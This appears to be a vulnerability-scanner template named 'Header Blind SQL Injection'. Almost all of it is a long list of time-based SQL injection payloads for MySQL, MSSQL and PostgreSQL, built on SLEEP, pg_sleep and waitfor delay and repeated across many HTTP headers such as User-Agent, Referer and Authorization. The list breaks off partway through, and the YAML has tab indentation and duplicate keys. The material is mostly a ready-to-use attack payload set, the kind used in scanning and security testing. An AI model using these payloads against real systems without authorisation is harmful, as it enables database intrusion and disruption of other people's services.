id: blind-sqli

info:
  name: Header Blind SQL Injection
  author: 0xpugazh
  severity: high
  metadata:
    max-request: 1596
  tags: sqli

http:
  - method: GET, POST
    path:
      - "{{BaseURL}}"
    headers:
		User-Agent: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		User-Agent: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		User-Agent: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		User-Agent: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		User-Agent: sleep(30)#
		User-Agent: (select * from (select(sleep(30)))a)
		User-Agent: 1 or sleep(30)#
		User-Agent: " or sleep(30)#
		User-Agent: ' or sleep(30)#
		User-Agent: " or sleep(30)="
		User-Agent: ' or sleep(30)='
		User-Agent: 1) or sleep(30)#
		User-Agent: ") or sleep(30)="
		User-Agent: ') or sleep(30)='
		User-Agent: 1)) or sleep(30)#
		User-Agent: ")) or sleep(30)="
		User-Agent: ')) or sleep(30)='
		User-Agent: ;waitfor delay '0:0:30'--
		User-Agent: );waitfor delay '0:0:30'--
		User-Agent: ';waitfor delay '0:0:30'--
		User-Agent: ";waitfor delay '0:0:30'--
		User-Agent: ');waitfor delay '0:0:30'--
		User-Agent: ");waitfor delay '0:0:30'--
		User-Agent: ));waitfor delay '0:0:30'--
		User-Agent: '));waitfor delay '0:0:30'--
		User-Agent: "));waitfor delay '0:0:30'--
		User-Agent: pg_sleep(30)--
		User-Agent: 1 or pg_sleep(30)--
		User-Agent: " or pg_sleep(30)--
		User-Agent: ' or pg_sleep(30)--
		User-Agent: 1) or pg_sleep(30)--
		User-Agent: ") or pg_sleep(30)--
		User-Agent: ') or pg_sleep(30)--
		User-Agent: 1)) or pg_sleep(30)--
		User-Agent: ")) or pg_sleep(30)--
		User-Agent: ')) or pg_sleep(30)--
		User-Agent: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		User-Agent: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		User-Agent: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		User-Agent: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		User-Agent: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		User-Agent: SLEEP(30)#
		User-Agent: SLEEP(30)--
		User-Agent: SLEEP(30)="
		User-Agent: SLEEP(30)='
		User-Agent: or SLEEP(30)
		User-Agent: or SLEEP(30)#
		User-Agent: or SLEEP(30)--
		User-Agent: or SLEEP(30)="
		User-Agent: or SLEEP(30)='
		User-Agent: waitfor delay '00:00:30'
		User-Agent: waitfor delay '00:00:30'--
		User-Agent: waitfor delay '00:00:30'#
		User-Agent: pg_SLEEP(30)
		User-Agent: pg_SLEEP(30)--
		User-Agent: pg_SLEEP(30)#
		User-Agent: or pg_SLEEP(30)
		User-Agent: or pg_SLEEP(30)--
		User-Agent: or pg_SLEEP(30)#
		User-Agent: AnD SLEEP(30)
		User-Agent: AnD SLEEP(30)--
		User-Agent: AnD SLEEP(30)#
		User-Agent: &&SLEEP(30)
		User-Agent: &&SLEEP(30)--
		User-Agent: &&SLEEP(30)#
		User-Agent: ' AnD SLEEP(30) ANd '1
		User-Agent: '&&SLEEP(30)&&'1
		User-Agent: ORDER BY SLEEP(30)
		User-Agent: ORDER BY SLEEP(30)--
		User-Agent: ORDER BY SLEEP(30)#
		User-Agent: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		User-Agent: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		User-Agent: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		User-Agent: + SLEEP(30) + '
		User-Agent: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Referer: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Referer: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Referer: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Referer: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Referer: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Referer: sleep(30)#
		Referer: (select * from (select(sleep(30)))a)
		Referer: 1 or sleep(30)#
		Referer: " or sleep(30)#
		Referer: ' or sleep(30)#
		Referer: " or sleep(30)="
		Referer: ' or sleep(30)='
		Referer: 1) or sleep(30)#
		Referer: ") or sleep(30)="
		Referer: ') or sleep(30)='
		Referer: 1)) or sleep(30)#
		Referer: ")) or sleep(30)="
		Referer: ')) or sleep(30)='
		Referer: ;waitfor delay '0:0:30'--
		Referer: );waitfor delay '0:0:30'--
		Referer: ';waitfor delay '0:0:30'--
		Referer: ";waitfor delay '0:0:30'--
		Referer: ');waitfor delay '0:0:30'--
		Referer: ");waitfor delay '0:0:30'--
		Referer: ));waitfor delay '0:0:30'--
		Referer: '));waitfor delay '0:0:30'--
		Referer: "));waitfor delay '0:0:30'--
		Referer: pg_sleep(30)--
		Referer: 1 or pg_sleep(30)--
		Referer: " or pg_sleep(30)--
		Referer: ' or pg_sleep(30)--
		Referer: 1) or pg_sleep(30)--
		Referer: ") or pg_sleep(30)--
		Referer: ') or pg_sleep(30)--
		Referer: 1)) or pg_sleep(30)--
		Referer: ")) or pg_sleep(30)--
		Referer: ')) or pg_sleep(30)--
		Referer: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Referer: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Referer: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Referer: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Referer: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Referer: SLEEP(30)#
		Referer: SLEEP(30)--
		Referer: SLEEP(30)="
		Referer: SLEEP(30)='
		Referer: or SLEEP(30)
		Referer: or SLEEP(30)#
		Referer: or SLEEP(30)--
		Referer: or SLEEP(30)="
		Referer: or SLEEP(30)='
		Referer: waitfor delay '00:00:30'
		Referer: waitfor delay '00:00:30'--
		Referer: waitfor delay '00:00:30'#
		Referer: pg_SLEEP(30)
		Referer: pg_SLEEP(30)--
		Referer: pg_SLEEP(30)#
		Referer: or pg_SLEEP(30)
		Referer: or pg_SLEEP(30)--
		Referer: or pg_SLEEP(30)#
		Referer: AnD SLEEP(30)
		Referer: AnD SLEEP(30)--
		Referer: AnD SLEEP(30)#
		Referer: &&SLEEP(30)
		Referer: &&SLEEP(30)--
		Referer: &&SLEEP(30)#
		Referer: ' AnD SLEEP(30) ANd '1
		Referer: '&&SLEEP(30)&&'1
		Referer: ORDER BY SLEEP(30)
		Referer: ORDER BY SLEEP(30)--
		Referer: ORDER BY SLEEP(30)#
		Referer: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Referer: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Referer: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Referer: + SLEEP(30) + '
		Referer: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Forwarded-For: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Forwarded-For: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Forwarded-For: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Forwarded-For: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Forwarded-For: sleep(30)#
		X-Forwarded-For: (select * from (select(sleep(30)))a)
		X-Forwarded-For: 1 or sleep(30)#
		X-Forwarded-For: " or sleep(30)#
		X-Forwarded-For: ' or sleep(30)#
		X-Forwarded-For: " or sleep(30)="
		X-Forwarded-For: ' or sleep(30)='
		X-Forwarded-For: 1) or sleep(30)#
		X-Forwarded-For: ") or sleep(30)="
		X-Forwarded-For: ') or sleep(30)='
		X-Forwarded-For: 1)) or sleep(30)#
		X-Forwarded-For: ")) or sleep(30)="
		X-Forwarded-For: ')) or sleep(30)='
		X-Forwarded-For: ;waitfor delay '0:0:30'--
		X-Forwarded-For: );waitfor delay '0:0:30'--
		X-Forwarded-For: ';waitfor delay '0:0:30'--
		X-Forwarded-For: ";waitfor delay '0:0:30'--
		X-Forwarded-For: ');waitfor delay '0:0:30'--
		X-Forwarded-For: ");waitfor delay '0:0:30'--
		X-Forwarded-For: ));waitfor delay '0:0:30'--
		X-Forwarded-For: '));waitfor delay '0:0:30'--
		X-Forwarded-For: "));waitfor delay '0:0:30'--
		X-Forwarded-For: pg_sleep(30)--
		X-Forwarded-For: 1 or pg_sleep(30)--
		X-Forwarded-For: " or pg_sleep(30)--
		X-Forwarded-For: ' or pg_sleep(30)--
		X-Forwarded-For: 1) or pg_sleep(30)--
		X-Forwarded-For: ") or pg_sleep(30)--
		X-Forwarded-For: ') or pg_sleep(30)--
		X-Forwarded-For: 1)) or pg_sleep(30)--
		X-Forwarded-For: ")) or pg_sleep(30)--
		X-Forwarded-For: ')) or pg_sleep(30)--
		X-Forwarded-For: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Forwarded-For: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Forwarded-For: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Forwarded-For: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Forwarded-For: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Forwarded-For: SLEEP(30)#
		X-Forwarded-For: SLEEP(30)--
		X-Forwarded-For: SLEEP(30)="
		X-Forwarded-For: SLEEP(30)='
		X-Forwarded-For: or SLEEP(30)
		X-Forwarded-For: or SLEEP(30)#
		X-Forwarded-For: or SLEEP(30)--
		X-Forwarded-For: or SLEEP(30)="
		X-Forwarded-For: or SLEEP(30)='
		X-Forwarded-For: waitfor delay '00:00:30'
		X-Forwarded-For: waitfor delay '00:00:30'--
		X-Forwarded-For: waitfor delay '00:00:30'#
		X-Forwarded-For: pg_SLEEP(30)
		X-Forwarded-For: pg_SLEEP(30)--
		X-Forwarded-For: pg_SLEEP(30)#
		X-Forwarded-For: or pg_SLEEP(30)
		X-Forwarded-For: or pg_SLEEP(30)--
		X-Forwarded-For: or pg_SLEEP(30)#
		X-Forwarded-For: AnD SLEEP(30)
		X-Forwarded-For: AnD SLEEP(30)--
		X-Forwarded-For: AnD SLEEP(30)#
		X-Forwarded-For: &&SLEEP(30)
		X-Forwarded-For: &&SLEEP(30)--
		X-Forwarded-For: &&SLEEP(30)#
		X-Forwarded-For: ' AnD SLEEP(30) ANd '1
		X-Forwarded-For: '&&SLEEP(30)&&'1
		X-Forwarded-For: ORDER BY SLEEP(30)
		X-Forwarded-For: ORDER BY SLEEP(30)--
		X-Forwarded-For: ORDER BY SLEEP(30)#
		X-Forwarded-For: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Forwarded-For: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Forwarded-For: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Forwarded-For: + SLEEP(30) + '
		X-Forwarded-For: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		X-Forwarded-Host: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		X-Forwarded-Host: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		X-Forwarded-Host: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		X-Forwarded-Host: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		X-Forwarded-Host: sleep(30)#
		X-Forwarded-Host: (select * from (select(sleep(30)))a)
		X-Forwarded-Host: 1 or sleep(30)#
		X-Forwarded-Host: " or sleep(30)#
		X-Forwarded-Host: ' or sleep(30)#
		X-Forwarded-Host: " or sleep(30)="
		X-Forwarded-Host: ' or sleep(30)='
		X-Forwarded-Host: 1) or sleep(30)#
		X-Forwarded-Host: ") or sleep(30)="
		X-Forwarded-Host: ') or sleep(30)='
		X-Forwarded-Host: 1)) or sleep(30)#
		X-Forwarded-Host: ")) or sleep(30)="
		X-Forwarded-Host: ')) or sleep(30)='
		X-Forwarded-Host: ;waitfor delay '0:0:30'--
		X-Forwarded-Host: );waitfor delay '0:0:30'--
		X-Forwarded-Host: ';waitfor delay '0:0:30'--
		X-Forwarded-Host: ";waitfor delay '0:0:30'--
		X-Forwarded-Host: ');waitfor delay '0:0:30'--
		X-Forwarded-Host: ");waitfor delay '0:0:30'--
		X-Forwarded-Host: ));waitfor delay '0:0:30'--
		X-Forwarded-Host: '));waitfor delay '0:0:30'--
		X-Forwarded-Host: "));waitfor delay '0:0:30'--
		X-Forwarded-Host: pg_sleep(30)--
		X-Forwarded-Host: 1 or pg_sleep(30)--
		X-Forwarded-Host: " or pg_sleep(30)--
		X-Forwarded-Host: ' or pg_sleep(30)--
		X-Forwarded-Host: 1) or pg_sleep(30)--
		X-Forwarded-Host: ") or pg_sleep(30)--
		X-Forwarded-Host: ') or pg_sleep(30)--
		X-Forwarded-Host: 1)) or pg_sleep(30)--
		X-Forwarded-Host: ")) or pg_sleep(30)--
		X-Forwarded-Host: ')) or pg_sleep(30)--
		X-Forwarded-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		X-Forwarded-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		X-Forwarded-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		X-Forwarded-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		X-Forwarded-Host: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		X-Forwarded-Host: SLEEP(30)#
		X-Forwarded-Host: SLEEP(30)--
		X-Forwarded-Host: SLEEP(30)="
		X-Forwarded-Host: SLEEP(30)='
		X-Forwarded-Host: or SLEEP(30)
		X-Forwarded-Host: or SLEEP(30)#
		X-Forwarded-Host: or SLEEP(30)--
		X-Forwarded-Host: or SLEEP(30)="
		X-Forwarded-Host: or SLEEP(30)='
		X-Forwarded-Host: waitfor delay '00:00:30'
		X-Forwarded-Host: waitfor delay '00:00:30'--
		X-Forwarded-Host: waitfor delay '00:00:30'#
		X-Forwarded-Host: pg_SLEEP(30)
		X-Forwarded-Host: pg_SLEEP(30)--
		X-Forwarded-Host: pg_SLEEP(30)#
		X-Forwarded-Host: or pg_SLEEP(30)
		X-Forwarded-Host: or pg_SLEEP(30)--
		X-Forwarded-Host: or pg_SLEEP(30)#
		X-Forwarded-Host: AnD SLEEP(30)
		X-Forwarded-Host: AnD SLEEP(30)--
		X-Forwarded-Host: AnD SLEEP(30)#
		X-Forwarded-Host: &&SLEEP(30)
		X-Forwarded-Host: &&SLEEP(30)--
		X-Forwarded-Host: &&SLEEP(30)#
		X-Forwarded-Host: ' AnD SLEEP(30) ANd '1
		X-Forwarded-Host: '&&SLEEP(30)&&'1
		X-Forwarded-Host: ORDER BY SLEEP(30)
		X-Forwarded-Host: ORDER BY SLEEP(30)--
		X-Forwarded-Host: ORDER BY SLEEP(30)#
		X-Forwarded-Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		X-Forwarded-Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		X-Forwarded-Host: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		X-Forwarded-Host: + SLEEP(30) + '
		X-Forwarded-Host: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Accept: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Accept: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Accept: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Accept: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Accept: sleep(30)#
		Accept: (select * from (select(sleep(30)))a)
		Accept: 1 or sleep(30)#
		Accept: " or sleep(30)#
		Accept: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Accept: ' or sleep(30)#
		Accept: " or sleep(30)="
		Accept: ' or sleep(30)='
		Accept: 1) or sleep(30)#
		Accept: ") or sleep(30)="
		Accept: ') or sleep(30)='
		Accept: 1)) or sleep(30)#
		Accept: ")) or sleep(30)="
		Accept: ')) or sleep(30)='
		Accept: ;waitfor delay '0:0:30'--
		Accept: );waitfor delay '0:0:30'--
		Accept: ';waitfor delay '0:0:30'--
		Accept: ";waitfor delay '0:0:30'--
		Accept: ');waitfor delay '0:0:30'--
		Accept: ");waitfor delay '0:0:30'--
		Accept: ));waitfor delay '0:0:30'--
		Accept: '));waitfor delay '0:0:30'--
		Accept: "));waitfor delay '0:0:30'--
		Accept: pg_sleep(30)--
		Accept: 1 or pg_sleep(30)--
		Accept: " or pg_sleep(30)--
		Accept: ' or pg_sleep(30)--
		Accept: 1) or pg_sleep(30)--
		Accept: ") or pg_sleep(30)--
		Accept: ') or pg_sleep(30)--
		Accept: 1)) or pg_sleep(30)--
		Accept: ")) or pg_sleep(30)--
		Accept: ')) or pg_sleep(30)--
		Accept: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Accept: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Accept: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Accept: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Accept: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Accept: SLEEP(30)#
		Accept: SLEEP(30)--
		Accept: SLEEP(30)="
		Accept: SLEEP(30)='
		Accept: or SLEEP(30)
		Accept: or SLEEP(30)#
		Accept: or SLEEP(30)--
		Accept: or SLEEP(30)="
		Accept: or SLEEP(30)='
		Accept: waitfor delay '00:00:30'
		Accept: waitfor delay '00:00:30'--
		Accept: waitfor delay '00:00:30'#
		Accept: pg_SLEEP(30)
		Accept: pg_SLEEP(30)--
		Accept: pg_SLEEP(30)#
		Accept: or pg_SLEEP(30)
		Accept: or pg_SLEEP(30)--
		Accept: or pg_SLEEP(30)#
		Accept: AnD SLEEP(30)
		Accept: AnD SLEEP(30)--
		Accept: AnD SLEEP(30)#
		Accept: &&SLEEP(30)
		Accept: &&SLEEP(30)--
		Accept: &&SLEEP(30)#
		Accept: ' AnD SLEEP(30) ANd '1
		Accept: '&&SLEEP(30)&&'1
		Accept: ORDER BY SLEEP(30)
		Accept: ORDER BY SLEEP(30)--
		Accept: ORDER BY SLEEP(30)#
		Accept: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Accept: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Accept: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Accept: + SLEEP(30) + '
		Accept: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Accept-Encoding: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Accept-Encoding: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Accept-Encoding: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Accept-Encoding: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Accept-Encoding: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Accept-Encoding: sleep(30)#
		Accept-Encoding: (select * from (select(sleep(30)))a)
		Accept-Encoding: 1 or sleep(30)#
		Accept-Encoding: " or sleep(30)#
		Accept-Encoding: ' or sleep(30)#
		Accept-Encoding: " or sleep(30)="
		Accept-Encoding: ' or sleep(30)='
		Accept-Encoding: 1) or sleep(30)#
		Accept-Encoding: ") or sleep(30)="
		Accept-Encoding: ') or sleep(30)='
		Accept-Encoding: 1)) or sleep(30)#
		Accept-Encoding: ")) or sleep(30)="
		Accept-Encoding: ')) or sleep(30)='
		Accept-Encoding: ;waitfor delay '0:0:30'--
		Accept-Encoding: );waitfor delay '0:0:30'--
		Accept-Encoding: ';waitfor delay '0:0:30'--
		Accept-Encoding: ";waitfor delay '0:0:30'--
		Accept-Encoding: ');waitfor delay '0:0:30'--
		Accept-Encoding: ");waitfor delay '0:0:30'--
		Accept-Encoding: ));waitfor delay '0:0:30'--
		Accept-Encoding: '));waitfor delay '0:0:30'--
		Accept-Encoding: "));waitfor delay '0:0:30'--
		Accept-Encoding: pg_sleep(30)--
		Accept-Encoding: 1 or pg_sleep(30)--
		Accept-Encoding: " or pg_sleep(30)--
		Accept-Encoding: ' or pg_sleep(30)--
		Accept-Encoding: 1) or pg_sleep(30)--
		Accept-Encoding: ") or pg_sleep(30)--
		Accept-Encoding: ') or pg_sleep(30)--
		Accept-Encoding: 1)) or pg_sleep(30)--
		Accept-Encoding: ")) or pg_sleep(30)--
		Accept-Encoding: ')) or pg_sleep(30)--
		Accept-Encoding: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Accept-Encoding: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Accept-Encoding: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Accept-Encoding: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Accept-Encoding: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Accept-Encoding: SLEEP(30)#
		Accept-Encoding: SLEEP(30)--
		Accept-Encoding: SLEEP(30)="
		Accept-Encoding: SLEEP(30)='
		Accept-Encoding: or SLEEP(30)
		Accept-Encoding: or SLEEP(30)#
		Accept-Encoding: or SLEEP(30)--
		Accept-Encoding: or SLEEP(30)="
		Accept-Encoding: or SLEEP(30)='
		Accept-Encoding: waitfor delay '00:00:30'
		Accept-Encoding: waitfor delay '00:00:30'--
		Accept-Encoding: waitfor delay '00:00:30'#
		Accept-Encoding: pg_SLEEP(30)
		Accept-Encoding: pg_SLEEP(30)--
		Accept-Encoding: pg_SLEEP(30)#
		Accept-Encoding: or pg_SLEEP(30)
		Accept-Encoding: or pg_SLEEP(30)--
		Accept-Encoding: or pg_SLEEP(30)#
		Accept-Encoding: AnD SLEEP(30)
		Accept-Encoding: AnD SLEEP(30)--
		Accept-Encoding: AnD SLEEP(30)#
		Accept-Encoding: &&SLEEP(30)
		Accept-Encoding: &&SLEEP(30)--
		Accept-Encoding: &&SLEEP(30)#
		Accept-Encoding: ' AnD SLEEP(30) ANd '1
		Accept-Encoding: '&&SLEEP(30)&&'1
		Accept-Encoding: ORDER BY SLEEP(30)
		Accept-Encoding: ORDER BY SLEEP(30)--
		Accept-Encoding: ORDER BY SLEEP(30)#
		Accept-Encoding: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Accept-Encoding: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Accept-Encoding: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Accept-Encoding: + SLEEP(30) + '
		Accept-Encoding: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Authorization: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Authorization: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Authorization: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Authorization: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Authorization: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Authorization: sleep(30)#
		Authorization: (select * from (select(sleep(30)))a)
		Authorization: 1 or sleep(30)#
		Authorization: " or sleep(30)#
		Authorization: ' or sleep(30)#
		Authorization: " or sleep(30)="
		Authorization: ' or sleep(30)='
		Authorization: 1) or sleep(30)#
		Authorization: ") or sleep(30)="
		Authorization: ') or sleep(30)='
		Authorization: 1)) or sleep(30)#
		Authorization: ")) or sleep(30)="
		Authorization: ')) or sleep(30)='
		Authorization: ;waitfor delay '0:0:30'--
		Authorization: );waitfor delay '0:0:30'--
		Authorization: ';waitfor delay '0:0:30'--
		Authorization: ";waitfor delay '0:0:30'--
		Authorization: ');waitfor delay '0:0:30'--
		Authorization: ");waitfor delay '0:0:30'--
		Authorization: ));waitfor delay '0:0:30'--
		Authorization: '));waitfor delay '0:0:30'--
		Authorization: "));waitfor delay '0:0:30'--
		Authorization: pg_sleep(30)--
		Authorization: 1 or pg_sleep(30)--
		Authorization: " or pg_sleep(30)--
		Authorization: ' or pg_sleep(30)--
		Authorization: 1) or pg_sleep(30)--
		Authorization: ") or pg_sleep(30)--
		Authorization: ') or pg_sleep(30)--
		Authorization: 1)) or pg_sleep(30)--
		Authorization: ")) or pg_sleep(30)--
		Authorization: ')) or pg_sleep(30)--
		Authorization: AND (SELECT * FROM (SELECT(SLEEP(30)))bAKL) AND 'vRxe'='vRxe
		Authorization: AND (SELECT * FROM (SELECT(SLEEP(30)))YjoC) AND '%'='
		Authorization: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)
		Authorization: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)--
		Authorization: AND (SELECT * FROM (SELECT(SLEEP(30)))nQIP)#
		Authorization: SLEEP(30)#
		Authorization: SLEEP(30)--
		Authorization: SLEEP(30)="
		Authorization: SLEEP(30)='
		Authorization: or SLEEP(30)
		Authorization: or SLEEP(30)#
		Authorization: or SLEEP(30)--
		Authorization: or SLEEP(30)="
		Authorization: or SLEEP(30)='
		Authorization: waitfor delay '00:00:30'
		Authorization: waitfor delay '00:00:30'--
		Authorization: waitfor delay '00:00:30'#
		Authorization: pg_SLEEP(30)
		Authorization: pg_SLEEP(30)--
		Authorization: pg_SLEEP(30)#
		Authorization: or pg_SLEEP(30)
		Authorization: or pg_SLEEP(30)--
		Authorization: or pg_SLEEP(30)#
		Authorization: AnD SLEEP(30)
		Authorization: AnD SLEEP(30)--
		Authorization: AnD SLEEP(30)#
		Authorization: &&SLEEP(30)
		Authorization: &&SLEEP(30)--
		Authorization: &&SLEEP(30)#
		Authorization: ' AnD SLEEP(30) ANd '1
		Authorization: '&&SLEEP(30)&&'1
		Authorization: ORDER BY SLEEP(30)
		Authorization: ORDER BY SLEEP(30)--
		Authorization: ORDER BY SLEEP(30)#
		Authorization: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)
		Authorization: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)#
		Authorization: (SELECT * FROM (SELECT(SLEEP(30)))ecMj)--
		Authorization: + SLEEP(30) + '
		Authorization: SLEEP(30)/*' or SLEEP(30) or '" or SLEEP(30) or "*/
		Cache-Control: 0'XOR(if(now()=sysdate()%2Csleep(30)%2C0))XOR'Z
		Cache-Control: 0'XOR(if(now()=sysdate(),sleep(30),0))XOR'Z
		Cache-Control: 1+++((SELECT+1+FROM+(SELECT+SLEEP(30))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(30))A)))OR"*/+/*+60c97910-84e4-41d1-a2ef-cadb84887e89+*/
		Cache-Control: (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/
		Cache-Control: 1;SELECT IF((8303>8302),SLEEP(30),2356)#
		Cache-Control: sleep(30)#
		Cache-Control: (select * from (select(sleep(30)))a)
		Cache-Control: 1 or sleep(30)#
		Cache-Control: " or sleep(30)#
		Cache-Control: ' or sleep(30)#
		Cache-Control: " or sleep(30)="
		Cache-Control: ' or sleep(30)='
		Cache-Control: 1) or sleep(30)#
		Cache-Control: ") or sleep(30)="
